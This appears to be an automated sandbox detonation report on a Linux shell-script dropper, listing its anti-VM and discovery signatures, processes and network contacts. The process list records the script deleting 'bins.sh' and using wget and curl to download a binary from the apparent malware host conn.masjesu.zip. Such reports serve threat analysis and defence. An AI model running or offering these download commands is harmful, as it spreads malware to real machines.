US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
US 151.101.129.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 03:08

Reported

2024-10-18 03:11

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

17s

Command Line

[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh

[/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A